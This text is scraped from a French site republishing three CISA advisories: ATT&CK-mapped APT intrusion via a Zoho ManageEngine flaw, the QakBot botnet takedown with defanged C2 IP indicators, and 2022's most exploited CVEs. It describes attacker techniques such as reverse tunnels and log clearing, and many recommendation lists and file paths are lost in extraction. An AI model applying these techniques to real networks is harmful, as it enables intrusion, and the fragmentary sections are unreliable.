andsecurity.hiv
to obtain information about the data used by the operating system.Remote System Discovery
T1018
Actors downloaded the legitimate file/application
nmap.exe
via theAzure
user to conduct network information gathering efforts.Network Sniffing
T1040
Actors downloaded the legitimate file/application
npcap.exe
via theAzure
user to conduct credential gathering efforts.Network Service Discovery
T1046
Actors executed DNS scanning at a web server and directed callback to the
Interact.sh
domain, which indicated the server was susceptible to a DNS-style attack.Process Discovery
T1057
ProcDump was created within the
c:windowssystem32prc64.exe
directory as a method for enumerating running processes/applications.Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
Ngrok was used to establish an RDP connection with the ServiceDesk system.
Lateral Tool Transfer
T1570
Actors compromised one host and moved laterally to install
anydesk.exe
on two additional hosts.Technique Title
ID
Use
Data Staged
T1074
Actors executed
xpack.exe
malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.Technique Title
ID
Use
Application Layer Protocol: Web Protocols
T1071.001
Hello World
User-Agent string was identified in a HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.Remote Access Software
T1219
Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.
Anydesk.exe
was run on at least three different hosts in the environment.Non-Standard Port
T1571
Actors initiated multiple TLS-encrypted sessions on non-standard TCP port
10443
.Protocol Tunneling
T1572
Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment.
Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.
Encrypted Channel: Asymmetric Cryptography
T1573.002
Actors initiated multiple TLS-encrypted sessions on TCP port
10443
, indicating successful exchanges of data transfer from the firewall device.DETECTION METHODS
CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.
net user /add
,useradd
, anddscl -create
[DS0017].CreateServiceW()
) to repeatedly execute malicious payloads as part of persistence [DS0009].MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]
CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:
Segment Networks [CPG 2.F]
CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.
Manage Accounts, Permissions, and Workstations
APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:
Secure Remote Access Software
Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:
For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.
Other Best Practice Mitigation Recommendations
PROGRAMFILES
,PROGRAMFILES(X86)
, andSYSTEM32
. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.
REFERENCES
VERSION HISTORY
September 7, 2023: Initial version.
Source de l’article sur us-cert.gov
Identification and Disruption of QakBot Infrastructure
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.
CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
TECHNICAL DETAILS
Overview
QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.
Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.
QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.
QakBot Infrastructure
QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.
Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.
The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.
Indicators of Compromise
FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
C:UsersAppDataRoamingMicrosoft
HKEY_CURRENT_USERSoftwareMicrosoft
In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.
Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
IP Address
First Seen
85.14.243[.]111
April 2020
51.38.62[.]181
April 2021
51.38.62[.]182
December 2021
185.4.67[.]6
April 2022
62.141.42[.]36
April 2022
87.117.247[.]41
May 2022
89.163.212[.]111
May 2022
193.29.187[.]57
May 2022
193.201.9[.]93
June 2022
94.198.50[.]147
August 2022
94.198.50[.]210
August 2022
188.127.243[.]130
September 2022
188.127.243[.]133
September 2022
94.198.51[.]202
October 2022
188.127.242[.]119
November 2022
188.127.242[.]178
November 2022
87.117.247[.]41
December 2022
190.2.143[.]38
December 2022
51.161.202[.]232
January 2023
51.195.49[.]228
January 2023
188.127.243[.]148
January 2023
23.236.181[.]102
Unknown
45.84.224[.]23
Unknown
46.151.30[.]109
Unknown
94.103.85[.]86
Unknown
94.198.53[.]17
Unknown
95.211.95[.]14
Unknown
95.211.172[.]6
Unknown
95.211.172[.]7
Unknown
95.211.172[.]86
Unknown
95.211.172[.]108
Unknown
95.211.172[.]109
Unknown
95.211.198[.]177
Unknown
95.211.250[.]97
Unknown
95.211.250[.]98
Unknown
95.211.250[.]117
Unknown
185.81.114[.]188
Unknown
188.127.243[.]145
Unknown
188.127.243[.]147
Unknown
188.127.243[.]193
Unknown
188.241.58[.]140
Unknown
193.29.187[.]41
Unknown
Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
MITRE ATT&CK TECHNIQUES
For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]
MITIGATIONS
Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller:
7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117
CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Best Practice Mitigation Recommendations
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Ransomware Guidance
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.
RESOURCES
REFERENCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
VERSION HISTORY
August 30, 2023: Initial version.
Source de l’article sur us-cert.gov
2022 Top Routinely Exploited Vulnerabilities
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Download the PDF version of this report:
TECHNICAL DETAILS
Key Findings
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.
Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).
Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.
Top Routinely Exploited Vulnerabilities
Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:
CVE
Vendor
Product
Type
CWE
CVE-2018-13379
Fortinet
FortiOS and FortiProxy
SSL VPN credential exposure
CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34473
(Proxy Shell)
Microsoft
Exchange Server
RCE
CWE-918 Server-Side Request Forgery (SSRF)
CVE-2021-31207
(Proxy Shell)
Microsoft
Exchange Server
Security Feature Bypass
CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-34523
(Proxy Shell)
Microsoft
Exchange Server
Elevation of Privilege
CWE-287 Improper Authentication
CVE-2021-40539
Zoho ManageEngine
ADSelfService Plus
RCE/
Authentication Bypass
CWE-287 Improper Authentication
CVE-2021-26084
Atlassian
Confluence Server and Data Center
Arbitrary code execution
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2021- 44228
(Log4Shell)
Apache
Log4j2
RCE
CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CWE-20 Improper Input Validation
CWE-400 Uncontrolled Resource Consumption
CWE-502 Deserialization of Untrusted Data
CVE-2022-22954
VMware
Workspace ONE Access and Identity Manager
RCE
CWE-94 Improper Control of Generation of Code (‘Code Injection’)
CVE-2022-22960
VMware
Workspace ONE Access, Identity Manager, and vRealize Automation
Improper Privilege Management
CWE-269 Improper Privilege Management
CVE-2022-1388
F5 Networks
BIG-IP
Missing Authentication Vulnerability
CWE-306 Missing Authentication for Critical Function
CVE-2022-30190
Microsoft
Multiple Products
RCE
None Listed
CVE-2022-26134
Atlassian
Confluence Server and Data Center
RCE
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
Additional Routinely Exploited Vulnerabilities
In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.
CVE
Vendor
Product
Type
CWE
CVE-2017-0199
Microsoft
Multiple Products
Arbitrary Code Execution
None Listed
CVE-2017-11882
Microsoft
Exchange Server
Arbitrary Code Execution
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CVE-2019-11510
Ivanti
Pulse Secure Pulse Connect Secure
Arbitrary File Reading
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2019-0708
Microsoft
Remote Desktop Services
RCE
CWE-416: Use After Free
CVE-2019-19781
Citrix
Application Delivery Controller and Gateway
Arbitrary Code Execution
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-5902
F5 Networks
BIG-IP
RCE
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2020-1472
Microsoft
Multiple Products
Privilege Escalation
CWE-330: Use of Insufficiently Random Values
CVE-2020-14882
Oracle
WebLogic Server
RCE
None Listed
CVE-2020-14883
Oracle
WebLogic Server
RCE
None Listed
CVE-2021-20016
SonicWALL
SSLVPN SMA100
SQL Injection
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
CVE-2021-26855
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-27065
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-26858
(ProxyLogon)
Microsoft
Exchange Server
RCE
None Listed
CVE-2021-26857
(ProxyLogon)
Microsoft
Exchange Server
RCE
CWE-502: Deserialization of Untrusted Data
CVE-2021-20021
SonicWALL
Email Security
Privilege Escalation Exploit Chain
CWE-269: Improper Privilege Management
CVE-2021-40438
Apache
HTTP Server
Server-Side Request Forgery
CWE-918: Server-Side Request Forgery (SSRF)
CVE-2021-41773
Apache
HTTP Server
Server Path Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-42013
Apache
HTTP Server
Server Path Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
CVE-2021-20038
SonicWall
SMA 100 Series Appliances
Stack-based Buffer Overflow
CWE-787: Out-of-bounds Write
CWE-121: Stack-based Buffer Overflow
CVE-2021-45046
Apache
Log4j
RCE
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-42475
Fortinet
FortiOS
Heap-based Buffer Overflow
CWE-787: Out-of-bounds Write
CVE-2022-24682
Zimbra
Collaboration Suite
‘Cross-site Scripting’
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
CVE-2022-22536
SAP
Internet Communication Manager (ICM)
HTTP Request Smuggling
CWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’)
CVE-2022-22963
VMware Tanzu
Spring Cloud
RCE
CWE-94: Improper Control of Generation of Code (‘Code Injection’)
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’)
CVE-2022-29464
WSO2
Multiple Products
RCE
CWE-434: Unrestricted Upload of File with Dangerous Type
CVE-2022-27924
Zimbra
Zimbra Collaboration Suite
Command Injection
CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
CVE-2022-22047
Microsoft
Windows CSRSS
Elevation of Privilege
CWE-269: Improper Privilege Management
CVE-2022-27593
QNAP
QNAP NAS
Externally Controlled Reference
CWE-610: Externally Controlled Reference to a Resource in Another Sphere
CVE-2022-41082
Microsoft
Exchange Server
Privilege Escalation
None Listed
CVE-2022-40684
Fortinet
FortiOS, FortiProxy, FortiSwitchManager
Authentication Bypass
CWE-306: Missing Authentication for Critical Function
MITIGATIONS
Vendors and Developers
The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:
For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
End-User Organizations
The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.
Vulnerability and Configuration Management
Identity and Access Management
Note: See CISA’s Capacity Enhancement Guide – Implementing Strong Authentication and ACSC’s guidance on Implementing Multi-Factor Authentication for more information on authentication system hardening.
Protective Controls and Architecture
Supply Chain Security
RESOURCES
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
PURPOSE
This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
REFERENCES
[1] Apache Log4j Vulnerability Guidance
VERSION HISTORY
August 3, 2023: Initial version.
APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES
CVE
Vendor
Affected Products and Versions
Patch Information
Resources
CVE-2017-0199
Microsoft
Multiple Products
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows
CVE-2017-11882
Microsoft
Office, Multiple Versions
Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882
CVE-2018-13379
Fortinet
FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6
FortiProxy – system file leak through SSL VPN special crafted HTTP resource requests
Joint CSAs:
Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CVE-2019-11510
Ivanti
Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12
SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX
CISA Alerts:
Continued Exploitation of Pulse Secure VPN Vulnerability
Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
ACSC Advisory:
2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software
Joint CSA:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CCCS Alert:
APT Actors Target U.S. and Allied Networks – Update 1
CVE-2019-0708
Microsoft
Remote Desktop Services
Remote Desktop Services Remote Code Execution Vulnerability
CVE-2019-19781
Citrix
ADC and Gateway version 13.0 all supported builds before 13.0.47.24
NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12
SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b
CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance
Joint CSAs:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
CCCS Alert:
Detecting Compromises relating to Citrix CVE-2019-19781
CVE-2020-5902
F5
BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5
K52145254: TMUI RCE vulnerability CVE-2020-5902
CISA Alert:
Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
CVE-2020-1472
Microsoft
Windows Server, Multiple Versions
Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472
ACSC Advisory:
2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Joint CSA:
APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
CCCS Alert:
Microsoft Netlogon Elevation of Privilege Vulnerability – CVE-2020-1472 – Update 1
CVE-2020-14882
Oracle
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Oracle Critical Patch Update Advisory – October 2020
CVE-2020-14883
Oracle
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Oracle Critical Patch Update Advisory – October 2020
CVE-2021-20016
SonicWALL
SSLVPN SMA100, Build Version 10.x
Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x
CVE-2021-26855
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-26858
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-27065
Microsoft
Multiple Products
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065
CISA Alert:
Mitigate Microsoft Exchange Server Vulnerabilities
CVE-2021-20021
SonicWALL
Email Security version 10.0.9.x Email Security
SonicWall Email Security pre-authentication administrative account creation vulnerability
CVE-2021-31207
Microsoft
Exchange Server, Multiple Versions
Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207
CISA Alert:
Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities
ACSC Alert:
Microsoft Exchange ProxyShell Targeting in Australia
CVE-2022-26134
Atlassian
Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Confluence Security Advisory 2022-06-02
CISA Alert:
CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog
ACSC Alert:
Remote code execution vulnerability present in Atlassian Confluence Server and Data Center
CVE-2021-34473
Microsoft
Exchange Server, Multiple Version
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473
Joint CSA:
Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
CVE-2021-34523
Microsoft
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2016 Cumulative Updates 19 and 20
Microsoft Exchange Server 2019 Cumulative Updates 8 and 9
Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523
CISA Alert:
Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities
CVE-2021-26084
Jira Atlassian
Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Jira Atlassian: Confluence Server Webwork OGNL injection – CVE-2021-26084
CISA Alert:
Atlassian Releases Security Updates for Confluence Server and Data Center
CVE-2021-40539
Zoho ManageEngineCorp.
ManageEngine ADSelfService Plus builds up to 6113
Security advisory – ADSelfService Plus authentication bypass vulnerability
ACSC Alert:
Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors
CVE-2021-40438
Apache
HTTP Server 2.4.48
CVE-2021-41773
Apache
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4 vulnerabilities
CVE-2021-42013
Apache
Apache HTTP Server 2.4.50
Apache HTTP Server 2.4 vulnerabilities
CVE-2021-20038
SonicWall
SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances
SonicWall patches multiple SMA100 affected vulnerabilities
ACSC Alert:
CCCS Alert:
SonicWall Security Advisory
CVE-2021- 44228
Apache
Log4j, all versions from 2.0-beta9 to 2.14.1
For other affected vendors and products, see CISA’s GitHub repository.
Apache Log4j Security Vulnerabilities
For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities
CISA webpage:
Apache Log4j Vulnerability Guidance
CCCS Alert:
Active exploitation of Apache Log4j vulnerability – Update 7
ACSC Advisory:
2021-007: Log4j vulnerability – advice and mitigations
ACSC Publication:
Log4j: What Boards and Directors Need to Know
CVE-2021-45046
Apache
Log4j 2.15.0Log4j
Apache Log4j Security Vulnerabilities
CVE-2022-42475
Fortinet
FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and
